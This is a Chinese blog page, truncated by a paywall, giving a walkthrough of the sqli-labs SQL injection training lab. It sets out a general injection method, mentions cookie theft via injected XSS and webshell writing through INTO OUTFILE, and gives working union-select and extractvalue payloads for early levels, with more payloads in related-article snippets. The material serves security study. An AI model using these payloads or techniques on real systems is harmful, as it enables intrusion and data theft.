sqli-labs(1-30) 个人思路分享——SQL注入

最新推荐文章于 2024-08-06 09:20:08 发布
最新推荐文章于 2024-08-06 09:20:08 发布
阅读量1.3k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: Web漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/CC__Faker/article/details/118076099
本文详细介绍了在sqli-labs的1-30关中如何利用SQL注入技术进行攻击,从基础的报错注入、联合查询到复杂的二次注入和WAF绕过,通过 payload 分析了每关的解决策略,并提供了相关资源链接以深入学习。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

下载地址:https://github.com/Audi-1/sqli-labs

注入思路: 首先判断注入参数的提交方式,像get、post、cookie,如果没有在注入参数用正确注入方法等于在做无用功。再判断适用注入方式,注入效率优先级 有回显>报错回显>状态回显>无回显,对应的注入方式是联合查询、报错注入、布尔盲注、延时注入。在注入的过程中也需要考虑是否有过滤,如果判断可能存在过滤,那需要进行相应绕过处理,大小写,双写,宽字节等。或许有的地方存在sql注入,但在获取敏感数据时会关键字过滤,或者有相应权限限制,同样要考虑绕过和提权。sql注入也可以和xss联动,像往可能返回给管理员的数据注入xss语句,其实就相当于存储型xss。盗取cookie再找到后台,基本上离利用管理员权限进入后台不远了。sql注入中和shell相关的就是into fileout函数,能确定服务器路径、能写入木马、能访问,基本上就等于get一个webshell,当然还要考虑免杀等相关细节。

目录

Page-1(Basic Challenges)

less-1

0x01
利用cc'key--+引起语句报错,发现报错中cc正常执行,于是猜测是单引号闭合。
0x02
利用order by判断,1' order by 3--+页面正常,1' order by 4--+页面不正常,推测出回显字段是3
0x03
使用联合查询判断回显字段0' union select 1,2,3--+
得到回显2,3。之后在2或3处注入带回显的语句即可。
payload:?id=0' union select 1,2,3 --+
如果想了解怎么继续获取数据库敏感数据,可以参考我另一篇博客:https://blog.youkuaiyun.com/CC__Faker/article/details/117970275

less-2

同样先令语句报错,判断出无需闭合
payload:?id=0 union select 1,2,3--+

less-3

令语句报错,判断出是 ') 闭合
payload:?id=0') union select 1,2,3--+--+

less-4

") 闭合
payload:?id=0") union select 1,2,3--+--+

less-5

第五关与前面不太一样,会出现报错回显,但无字段回显。
这里采用报错注入。下列语句报出数据库名
payload:?id='and(select extractvalue(1,concat('~',(select database()),'~')))--+
如果想了解怎么利用报错注入继续获取数据库敏感数据,可以参考我另一篇博客:https://blog.youkuaiyun.com/CC__Faker/article/details/118035305

less-6

利用报错判断闭合符号是 "
pa

最低0.47元/天 解锁文章

200万优质内容无限畅学
sql注入靶场sqli-labs常见sql注入漏洞详解
网安小菜鸡的博客
08-05 941
把表里面每一行的结果拼成一个字符串输出(
SQL注入——sqli-labs(Less-1
E-Malon的博客
05-29 443
一边查看源码,一边多方学习别人的 WriteUp,在此过程中补充基础知识,最终落到实验操作。慢慢来,比较快。欢迎大咖指导,欢迎各位网友交流经验。
sqli解题思路
qq_40661620的博客
07-30 500
** sqli解题思路 ** 小白开始重新学习sqli 1关: 单引号,字符串,错误注入,联合注入 http://172.16.13.33/sqli/Less-1/?id=1’ and 1=1–+ 接着进行联合注入 2关: 整型,报错,联合注入 http://172.16.13.33/sqli/Less-2/?id=1 and 1=2 整型可以不用加注释 后进行联合注入 3关 : 错...
sqlilabs靶场1—20题学习笔记(思路+解析+方法)
2301_79355407的博客
04-16 3009
此文章为初学者在学习SQL注入使用sqlilabs靶场的学习笔记,均为手工注入,未使用sqlmap。有很多出错以及不懂的地方。此文章会不断补充和更正。
SQL注入的常规思路及奇葩技巧
hl1293348082的专栏
04-10 257
最近在看《SQL注入攻击与防御》这本书,看了之后感觉自己之前的视野和格局还是太小了些。SQLi的应用特别广泛,多种web数据库不说,移动安卓端也存在通用的SQLi。而从语言的角度来看~PHP/JAVA/PYTHON/C#等等~都可以与SQLi联系起来,由语言特性而衍生的SQLi种类。最近还听说Javascript也能写后端了,着实把我高兴坏了,看来PHP这“世界上最好的语言”的称号,要换主了~ 同是弱类型语言,这俩哥们怕是要一绝“高低”。 废话说到这里,由于SQLi体系扩展还没有完成,所以在这里算是总结一
SQL注入思路|零基础也能看懂
向阳-Y.的博客
11-03 840
本教程采用墨者学院SQL注入靶机,所以注入方法不一定适用于每一个网站 SQL注入思路 想要sql注入,必须知道数据库的结构(数据库、表名、列名) 1.先判断有无注入点 判断方法: http://xxxxxx?id=1 and 1=1 #正常访问 http://xxxxxx?id=1 and 1=西瓜 #错误页面 当页面出现如上情况,表示有注入点 2.猜解列名数量 (order by x) 以下猜解说明有4个列名 http://xxxxxx?id=1 order by 1 #正常 http:/
SQL注入18】Sqli-labs靶场1~10关思路解析及思考总结——针对GET请求的注入思路
Fighting_hawk的博客
05-11 5949
1. 本文从SQLi-labs10关出发,总结各个关卡通关过程的思路。 2. 涵盖了联合查询注入、报错注入、布尔盲注和延时盲注四种基本类型。 3. 对比分析了不同参数测试时的用意,以便明确我们的注入思路。 4. 这些关卡暂未对输入参数进行过滤,对于采用了保护措施的程序,基本思路正确,也是有可能注入不了的。 .........
sqli-labs-php7-master.zip
04-06
SQL注入攻防演练平台——sqli-labs-php7-master》 在网络安全领域,CTF(Capture The Flag)比赛是一种常见的技术竞技形式,它旨在提升参赛者的网络安全技能,特别是对于Web安全的理解。在这个背景下,"sqli-labs...
sqli-labs注入——sqli-labs1-65关闯关指南
qq_51366383的博客
01-27 1982
sqli-labs图片上一共有75关,但是下载的资料都只有65关,所以只写了65关,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 4万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
SQL注入篇——sqli-labs最详细1-40闯关指南
爱国小白帽
01-11 3万+
使用sqli­labs游戏系统进行sql注入 1.首先确定用哪些字符可以进行sql注入 一.选择Less­1进入第一关,在网址中添加标红内容,显示了用户和密码 http://localhost/sqli­labs­master/Less­1/index.php?id=1’ and 1=1 ­­ ­ 把1=1改成1=2,不报错也不显示任何信息,说明可以利用 ’ 字符注入 二.进入第二关,在网址中添...
sqli-labs学习笔记(2) 思路总结 less 7-10
yukinorong的博客
08-14 260
sqli-labs笔记 less 7 导出文件注入,方法是构造一句话木马后,访问文件。 需要知道文件的位置。 两个变量 @@datadir 数据库路径 @@basedir MYSQL安装路径。 经教程提醒,最好先用本地数据库试一下。 https://www.cnblogs.com/omnis/p/8315087.html 在my.ini文件[mysqld]的后面加上secure_file_priv...
SqliLab_Mysql_Injection详解_字符型注入()_UNION联合查询(1~4)
qq_41260930的博客
10-19 1344
SqlLab_Mysql_Injection详解_数字型注入
sql-labs注入1-10关
jinhezhai的博客
01-13 1128
sql-labs1-20关
sqli-liabs学习SQL注入之旅(第一关~第十关)
guanjian_ci的博客
04-20 4165
第一关 第一步:判断参数的类型 ?id=1' 页面报错 ?id=1' --+ 页面正常 判断参数接受类型为 字符型 查看第一关源码:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 证明我们的判断正确! 第二步:猜解字段 ?id=1' order by 3 --+ 页面正常 ?id=1' order by 4 --+ 页面报错 判断字段长度为 3 第三步:爆数据库名 ?id=-
Sqli-labs通关手册【1-30关】
李安北的博客
05-03 7586
1.sql注入的原理 1sql注入的原因 语言分类:解释型语言和编译型语言。解释型语言是一种在运行时由一个运行时组件解释语言代码并执行其中包含的指令的语言。而编译型语言是代码在生成时转换为机器指令,然后在运行时直接由使用该语言的计算机执行这些指令。 例如:在与用户交互的程序中,用户的输入拼接到SQL语句中,执行了与原定计划不同的行为,从而产生了SQL注入漏洞。 2)登录案例讲解 主要是万能密码:登录SQL语句:select * from admin where username = ‘用户输入的用户名’
sqli-labs1-10关闯关心得与思路
m0_48294281的博客
03-08 6901
sqli-labs 1-11关闯关个人心得,欢迎交流指正。
sql注入靶场1-10关
最新发布
psz7722的博客
08-06 254
用order by语句来查看有几列,如果报错就是超过列数,如果显示正常就是没有超出列数。id=1' --+ //(--+为注释符)正常回显。提示你输入数字值的ID作为参数,我们输入?查询到账号密码在这个表中,现在要得到该字段内容。id=1' //报错。将3换成4后就报错,说明数据有3列。思路和第一关一样,先判断为什么类型。接下来判断是字符型还是数字型。
sqlilabs教程(1-10)
一个安全研究员
04-18 3万+
前言 最近在研究sql注入,只是看书有点无聊(不推荐大家去看《sql注入攻击与防御》,这本书的翻译很奇怪,而且内容不太适合小白,可以当小说看) less-1 根据提示,可以知道只是个单引号注入的题目,我们在参数后面加一个单引号看下效果: 可以看到数据库报错了,最重要的就是能够看懂数据库的错误信息,从错误信息中我们可以知道是单引号的匹配出了问题,也就是说我们添加的单引号成功被...
MySQL注入实战指南——Sqli-labs教程解析
1. **SQL注入 (SQLi)sqli-labs介绍** SQL注入是一种常见的网络安全漏洞,允许攻击者通过插入恶意SQL代码到输入字段来操纵数据库。sqli-labs是一个在线平台,提供了多个级别的挑战,用于实践和学习SQL注入技巧。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值